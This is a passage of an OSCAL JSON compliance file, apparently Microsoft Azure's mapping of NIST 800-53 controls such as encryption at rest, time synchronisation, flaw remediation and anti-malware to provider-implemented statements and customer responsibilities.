Connections also use RSA-based 2,048-bit encryption key lengths.\n* Logical access to protected data at rest is controlled at various levels through technical means. Access to servers where information is stored is restricted through Active Directory security group membership in the domain where the server resides. Security groups that restrict access to information at rest are configured to allow the least privilege possible to complete tasks. Any Microsoft personnel needing access must follow account creation, modification, and escalation procedures.\n* Technical means also create logical access control at the network layer. ACLs prevent servers that store data at rest from being exposed outside of the environment.\n* The Azure datacenter and Global Cloud Communication Center (GCC) teams maintain controls over physical access. The server rooms and caged environments have multiple access levels regulated with least privilege.\n* Privileged Access Workstations (PAWs) utilize BitLocker to protect information at rest."}],"responsibilities":[{"uuid":"c218adad-5257-47aa-bdd2-bc9d1dbf8c2b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-051"}],"description":"The customer is responsible for protecting customer-controlled information at rest. Microsoft Azure Storage provides the capability for customers to protect their information at rest using Azure storage account keys (SAKs) provided by Microsoft Azure. The SAK is a secret key that is used to manage access to storage. An application that needs to access storage must have possession of this key. 
It is the customer's responsibility to protect the SAKs in order to protect their data.","provided-uuid":"995c0a49-7737-4e34-a5fd-c9596fe4961d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dc075fa2-555a-40fb-b410-9b553d863c92","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-28.1_smt","by-components":[{"uuid":"d918664e-10f2-4e20-a6f0-ae60d416fdd5","export":{"provided":[{"uuid":"0b9da60c-c638-449e-8352-6f32aaec0d2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-052"}],"description":"Azure Storage automatically encrypts data when persisting it to the cloud. Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant. Azure Storage encryption is enabled for all new and existing storage accounts and cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. 
All object metadata is also encrypted."}],"responsibilities":[{"uuid":"5fd88169-0e9e-4862-bafc-fa013c3965e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-052"}],"description":"The customer is responsible for protecting customer-controlled information at rest from unauthorized disclosure and modification.","provided-uuid":"0b9da60c-c638-449e-8352-6f32aaec0d2a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5ac1b0d0-e111-4184-8cc4-d4b4a1842c29","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-39","statements":[{"uuid":"7276a48f-406e-4204-8703-fbb7e517524e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-39_smt","by-components":[{"uuid":"1e7532a2-eb0d-4df3-a1fa-89b888e8bf31","export":{"provided":[{"uuid":"a9ca226b-7797-460c-bdf1-90e2b3dd2f73","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-053"}],"description":"All Azure servers run operating systems that maintain separate execution domains for each executing process by assigning a private virtual address space to each process. In addition, all operating systems used in the Azure environment employ multi-thread processing, which is consistent with modern operating systems. Multi-thread processing allows for multiple processes to be executed concurrently and in isolation. 
See the following TechNet article for more information:\n\n<https://technet.microsoft.com/en-ca/aa366785%28v=vs.90%29>."}],"responsibilities":[{"uuid":"06e16e64-814c-40d3-a5bd-f79b07bfc3ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-053"}],"description":"The customer is responsible for maintaining separate execution domains for running processes.","provided-uuid":"a9ca226b-7797-460c-bdf1-90e2b3dd2f73"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dd4b6f66-e85e-4c76-ae17-3853975682ec","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-45","statements":[{"uuid":"299f25b7-3d7c-46b1-9758-49388c6ef006","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-45_smt","by-components":[{"uuid":"9f75ed86-a905-44f5-83e1-6feabd4643c6","export":{"provided":[{"uuid":"c5af5bdd-32c0-41a4-8255-f2b58c170dcd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-054"}],"description":"For Bare Metal servers, all assets are joined to an Active Directory domain and configured to receive authenticated time updates from the local domain controller via NTP and synchronize at least hourly. For Azure-based servers and network devices, all assets are configured to use the Coordinated Universal Time (UTC) setting when generating event logs. 
Once servers are joined to an Active Directory domain, they are configured by policy to receive authenticated time updates from the local domain controller via NTP and synchronize at least hourly and update the time if it is off by 1 millisecond or more. Local domain controllers obtain their time updates from Azure time servers. All Azure servers are configured to synchronize every five (5) minutes through Azure-managed domain controllers; network devices synchronize every five (5) minutes with the same time servers used by the Azure domain controllers. The Azure time servers are NTP stratum 1 time servers. Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. All Azure assets synchronize the internal system clocks to the authoritative time source at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"ba39bff0-8bda-4f55-afa1-2b51be830307","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-054"}],"description":"The customer is responsible for synchronizing system clocks within and between customer-deployed resources.","provided-uuid":"c5af5bdd-32c0-41a4-8255-f2b58c170dcd"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e9839d46-2949-45d8-96ef-1e5c9cb32a3d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-45.1","statements":[{"uuid":"83e25bc2-b2b8-4f02-8a45-07f92192a9b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-45.1_smt.a","by-components":[{"uuid":"8f20cac3-37bb-4644-b4b0-f9a550c6bd41","export":{"provided":[{"uuid":"08588581-2b6b-4014-8109-a00729c96749","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-055"}],"description":"Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. Azure compares internal system clocks deployed on Azure assets to GPS satellites. 
All Azure assets synchronize the internal system clocks to the authoritative time sources at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"e014ccfd-337c-41bf-9c13-0bc88347c757","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-055"}],"description":"The customer is responsible for comparing internal system clocks at a defined frequency with defined authoritative time source for customer-deployed resources.","provided-uuid":"08588581-2b6b-4014-8109-a00729c96749"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5c116a0e-cf69-4e7c-a2b4-d2a2fb1ec2e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-45.1_smt.b","by-components":[{"uuid":"380af501-02a2-4a39-ae18-f1e9bf375320","export":{"provided":[{"uuid":"554b8aaf-e475-41bf-b363-9254d7a0a79d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-056"}],"description":"Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. Azure synchronizes internal system clocks deployed on Azure assets to GPS satellites. 
All Azure assets synchronize the internal system clocks to the authoritative time sources at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"fa59a567-6e6e-49a2-84bc-ba726b82afc6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-056"}],"description":"The customer is responsible for synchronizing the internal system clocks to the authoritative time source when the time difference is greater than the defined time period for customer-deployed resources.","provided-uuid":"554b8aaf-e475-41bf-b363-9254d7a0a79d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"907687f3-b4e8-4323-b31a-67449ca1fbfa","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-2","statements":[{"uuid":"4559ccf8-52de-4087-98c3-ba45a2fdefe9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.a","by-components":[{"uuid":"d800fa16-7daf-4017-a500-db871f22a407","export":{"provided":[{"uuid":"035b4dec-2f34-407c-8e97-a1a2be70ada6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-006"}],"description":"Flaw Identification\n\nTo identify applicable software flaws, the C+AI Security team tracks multiple sources of information for vulnerability-related data. 
These sources include the Microsoft Security Response Center (MSRC), vendor websites, and other third-party websites. Updates tracked by these sources are monitored by C+AI Security for possible inclusion in its monthly security bulletins, notifications, and advisories. Based on their applicability to the Azure environment, only a subset of these updates may be required by C+AI Security.\n\nMicrosoft publishes bulletins that include specific information relevant to the security update being released. Azure reviews vulnerabilities that are deemed to have a significant impact on the operational environment. Microsoft bulletins are disseminated to all personnel. Additional information can be found on the following websites:\n\n* MSRC: <https://www.microsoft.com/en-us/msrc>\n* MSRC Bulletins and Advisories: <https://msrc.microsoft.com/update-guide/>\n\nNon-Microsoft software used in Azure to provide infrastructure services and client services is kept current for the optimal operation of the environment. Each software vendor provides information about their security updates. Vendor websites are monitored, including, but not limited to:\n\n* Cisco: <https://tools.cisco.com/security/center/publicationListing.x>\n* Juniper: <https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>\n* TippingPoint: <https://tmc.tippingpoint.com/TMC>\n* F5 Networks: <https://www.f5.com/services/support/security-incident-response-team-sirt> and <https://support.f5.com/csp/home>\n* NetScaler: <https://support.citrix.com/securitybulletins/>\n\nFor network devices, vendors make Azure Networking aware of security vulnerabilities in their products via email. The email is logged into Azure DevOps and analysis is performed to evaluate possible risks and mitigations. 
Azure Networking has dedicated support engineers from the major hardware vendors, including Cisco, Juniper, and F5, that assist with the analysis and determination of the course of action. Azure Networking tracks the issue to completion. A similar process is followed with updates provided by other vendors, with the goal of matching the updates required to the current Azure environment.\n\nThe C+AI Security team monitors Azure using automated vulnerability scanning tools. These tools are configured to report specific system security flaws to the C+AI Security team and users. Azure configures these tools based on knowledge provided by vendors and other sources, including analysis by C+AI Security. The C+AI Security team conducts the following activities monthly.\n\nOn the Thursday prior to release, the C+AI Security team holds a conference call with Azure stakeholders to review updates that are required in the Azure environment, based on the data provided in the Advance Notification Service by MSRC. Minutes from this call are recorded and saved for historical understanding of the rationale used to determine which updates were required in the past.\n\nOn release day, the second Tuesday of every month, MSRC provides a review via conference call of detailed information with Azure stakeholders for inclusion on the list of updates required in the Azure environment. A consensus is reached with Azure stakeholders on the required security updates for the Azure environment. Meeting minutes record attendees and any concerns regarding all released security updates.\n\nMSRC sends e-mail communication to broad Azure distribution lists that includes the list of required updates, the download location of required software, and the deadline for installation of the updates. 
After the email communication is sent, the same information is posted to the internal C+AI Security website for future reference._x000D_ _x000D_ Impact assessments are conducted for all vulnerabilities identified. The assessment encompasses multiple factors, including:_x000D_ _x000D_ * Access required, local or remote_x000D_ * Authentication requirements_x000D_ * Exploit availability_x000D_ * Outcome of exploitation such as remote code execution or elevation of privilege_x000D_ _x000D_ Flaw Correction_x000D_ _x000D_ The C+AI Security team assesses the vulnerability severity and criticality impact based on documented and deduced software and technology deployment and use in Azure environments. For example, Microsoft Expression Web is not used in Azure servers and therefore a vulnerability that impacts Expression Web is outside of the scope of updates required to be applied._x000D_ _x000D_ C+AI Security collects information from a variety of sources and scanners to help determine the inventory of applications installed in servers and the current threat surface. Specific steps in the vulnerability process include:_x000D_ _x000D_ * Review mitigating controls that may affect the vulnerability rating such as firewalls, Microsoft Defender for Endpoint (MDE) antivirus software, and ACLs_x000D_ * Review the Asset Value for the affected assets_x000D_ * Determine the timeframe for the application of the required updates_x000D_ _x000D_ Most security updates are required to be installed within thirty (30) days of the notification of the update's availability. 
C+AI Security occasionally requires an expedited timeline for the application of security updates based on the following criteria:_x000D_ _x000D_ * Applications or services affected_x000D_ * Availability of reliable exploit code_x000D_ * Prevalence of exploit activity_x000D_ * External regulator requirements, such as a Cybersecurity and Infrastructure Security Agency (CISA) Emergency Directive_x000D_ _x000D_ Information collected from C+AI Security monitoring efforts or an increase on the risk level faced by Azure servers may be used to expedite remediation of outstanding security vulnerabilities after the original deadline was set. These changes are communicated to the necessary personnel._x000D_ _x000D_ In partnership with other Azure teams, C+AI Security collects, analyzes, and alerts the security contacts for the affected property on system and network behavior that may be deemed malicious or that could be the effect of an intrusion. In coordination with the Security Response Team, events are analyzed and, if deemed to be an incident, are handled in accordance with the Incident Management SOP._x000D_ _x000D_ Verified flaws identified for Azure as a result of the Vulnerability Scanning Tools scan process are identified and tracked as part of the Azure Plan of Actions and Milestones (POA&M) process._x000D_ _x000D_ Flaw Reporting_x000D_ _x000D_ Reporting of security vulnerabilities is conducted via vulnerability scanning tool results. Azure provides a Vulnerability Management and Reporting Tool which provides Microsoft personnel the ability to review vulnerability data from a reporting interface. Vulnerability scans are conducted monthly at minimum. The vulnerability scan tools provide reports based on multiple criteria, including property, server, and security update. Communication from the C+AI Security team via Service 360 (S360) and email is used to notify service teams in cases of elevated risk or when expedited action is necessary. 
The remediation of vulnerabilities is one of the primary goals of the C+AI Security team. A variety of tools and processes are used to drive remediation:\n\n* Direct engagement with properties\n* Targeted efforts\n* Direct e-mail communication with service teams to drive remediation of high risk or expedited vulnerabilities\n* Security updates deployment services"}],"responsibilities":[{"uuid":"dbc295c2-9ebe-4da2-a08f-f35a87ee29a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-006"}],"description":"The customer is responsible for flaw remediation on customer-deployed resources, including the identification, reporting, and correction of flaws.","provided-uuid":"035b4dec-2f34-407c-8e97-a1a2be70ada6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ec55e299-45c0-43fc-b073-946977c12d29","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.b","by-components":[{"uuid":"4003c288-6893-4826-9dcf-4af376a30be3","export":{"provided":[{"uuid":"9335bee0-6a0f-451f-a086-71e02963740b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-007"}],"description":"Testing of software updates related to flaw remediation must follow the standard change management process as outlined in the Microsoft Change Management Standard. Service teams test possible changes to the environment to understand impacts to the security and operations of the system. 
Testing is also conducted via the Safe Deployment Practices (SDP)."}],"responsibilities":[{"uuid":"50845dc4-9a1a-41a5-893c-c6b4a8b60dcc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-007"}],"description":"The customer is responsible for testing updates related to flaw remediation for effectiveness and potential side effects prior to installation on customer-deployed resources.","provided-uuid":"9335bee0-6a0f-451f-a086-71e02963740b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"382742e9-4e49-4e88-9d7c-21290a5396c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.c","by-components":[{"uuid":"b96beb97-4290-4df0-bcc8-cf0271854994","export":{"provided":[{"uuid":"c7c48e13-b355-4967-8a3f-7753950a6d9c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-008"}],"description":"As noted in Part a, most security updates are required to be installed within thirty (30) days of the notification of the update's availability. 
C+AI Security requires on occasion an expedited timeline for the application of security updates based on the following criteria:\n\n* Applications or services affected\n* Availability of reliable exploit code\n* Prevalence of exploit activity\n* External regulator requirements, such as a Cybersecurity and Infrastructure Security Agency (CISA) Emergency Directive\n\nInformation collected from C+AI Security monitoring efforts or an increase in the risk level faced by Azure servers may be used to expedite remediation of outstanding security vulnerabilities after the original deadline was set. These changes are communicated to the necessary personnel.\n\nAzure uses automated tools to determine whether a required security flaw has been remediated properly and the date of installation of security updates. These tools collect information from each asset and compare it to the requirements defined for each security update or vulnerability ID."}],"responsibilities":[{"uuid":"aabebb07-cbe8-4a73-a848-7d48788b518f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-008"}],"description":"The customer is responsible for installing security-relevant software updates to customer-deployed resources within a customer-defined time period after the release of the update.","provided-uuid":"c7c48e13-b355-4967-8a3f-7753950a6d9c"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8873437f-a532-44ca-8cf1-5b0a00635202","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.d","by-components":[{"uuid":"c7c1150f-c331-4048-83b6-21fe59069112","export":{"provided":[{"uuid":"6ebeae7d-a87a-4f8a-bc12-b268874c0ad1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-009"}],"description":"Flaw remediation follows the standard change management process as outlined in the Microsoft Change Management Standard. The Policy Directives section describes the information required for submission of a request for change (RFC). Every RFC submission must contain a detailed test plan outlining the steps of the change, the success metrics of the test, and a rollback plan as a risk mitigation procedure. 
The change review committee evaluates the RFC to grant approval prior to implementation in a production environment."}],"responsibilities":[{"uuid":"c775f061-e54a-4194-beef-b925cd85c0ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-009"}],"description":"The customer is responsible for including flaw remediation in configuration management.","provided-uuid":"6ebeae7d-a87a-4f8a-bc12-b268874c0ad1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"97b76319-efc7-4b02-aa50-06044864d0dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-2.2","statements":[{"uuid":"5fd1a9b1-b30d-43ee-8a21-345524b38b64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2.2_smt","by-components":[{"uuid":"b71770a3-d789-4a52-be2d-3b0e0d3e9e20","export":{"provided":[{"uuid":"680a41b1-6214-4c5b-9cdb-22f307dd4c24","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-010"}],"description":"Azure utilizes a number of automated tools for vulnerability management. 
These tools perform scanning at least monthly and on demand against the Azure environment and determine the state of information system components regarding flaw remediation."}],"responsibilities":[{"uuid":"c676e421-0d3e-4305-8652-7714fd964141","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-010"}],"description":"The customer is responsible for employing automated mechanisms to determine flaw remediation status.","provided-uuid":"680a41b1-6214-4c5b-9cdb-22f307dd4c24"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ebbc4f94-eb86-4315-8e55-8b4b4873fa31","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-2.3","statements":[{"uuid":"ca591fa3-ea4c-4f85-9eed-69d250f6088c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2.3_smt.a","by-components":[{"uuid":"624ff750-92e4-46b9-9dd2-29390ce18653","export":{"provided":[{"uuid":"e28b4024-4bff-4c04-b57a-cfded1d67be4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-011"}],"description":"Azure scans all assets with vulnerability scanners. 
These scanners produce timestamps of initial flaw detections and flaw remediation and are used to calculate the time elapsed between the two."}],"responsibilities":[{"uuid":"9786a4ed-9b1f-46fe-b8fe-eb118df9369d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-011"}],"description":"The customer is responsible for remediating flaws within customer-deployed resources, including measuring the time between flaw identification and flaw remediation.","provided-uuid":"e28b4024-4bff-4c04-b57a-cfded1d67be4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"46b23513-b6bf-4b97-aeff-90ea06f1d681","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2.3_smt.b","by-components":[{"uuid":"721dc097-e065-45d5-a110-16056092e0db","export":{"provided":[{"uuid":"c3a3e096-95eb-4737-87ba-1c804329d4ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-012"}],"description":"To track and benchmark flaw remediation, Azure conducts reporting of security vulnerabilities via the scan results. Azure utilizes a Vulnerability Management and Reporting Tool which provides Azure personnel the ability to review vulnerability data from a reporting interface including the date the patch was made available.\n\nMost security updates are required to be installed within thirty (30) days of the notification of the update's availability. 
Verified flaws identified for Azure as a result of the monthly scan process are tracked as part of the Azure Plan of Actions and Milestones (POA&M) process."}],"responsibilities":[{"uuid":"f7d86e50-7e49-4c37-b86a-61230b949611","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-012"}],"description":"The customer is responsible for remediating flaws within customer-deployed resources and establishing customer-defined benchmarks for taking corrective actions.","provided-uuid":"c3a3e096-95eb-4737-87ba-1c804329d4ec"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"767bd294-ba41-4091-8b46-a741d28f7939","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-3","statements":[{"uuid":"6fa5102e-e017-4424-a8b6-0287be54f47c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-3_smt.a","by-components":[{"uuid":"1cf36af1-b054-403e-97f3-0bba2f4b0ccd","export":{"provided":[{"uuid":"2a1a7e3e-1d0c-4339-9269-b2ec4f28bfdb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-013"}],"description":"Servers\n\nThe use of anti-malware software is a principal mechanism for protection of Azure assets from malicious software. 
The software, deployed and managed by Azure Security Pack (AzSecPack), detects and prevents the introduction of viruses, malware, rootkits, worms, and other malicious software onto the services. The approved tools, Microsoft Defender AV and ClamAV, are installed as part of the initial build on all servers, including all entry and exit points to the Azure cloud. This software provides both preventive and detective control over malicious software using signature-based protection mechanisms. In addition to signature-based detection mechanisms, Defender also utilizes behavior monitoring, network inspection, and heuristics to detect malicious code that may be missed by signature-based methods.\n\nNetwork Devices\n\nNetwork devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software described above and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and comprehensive logging and monitoring."}],"responsibilities":[{"uuid":"bba4191c-154c-4eb8-81d8-97ba51389e5a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against malicious code by implementing signature-based, non-signature-based, or both malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.","provided-uuid":"2a1a7e3e-1d0c-4339-9269-b2ec4f28bfdb"}]},"description":"See inheritance and customer responsibility 
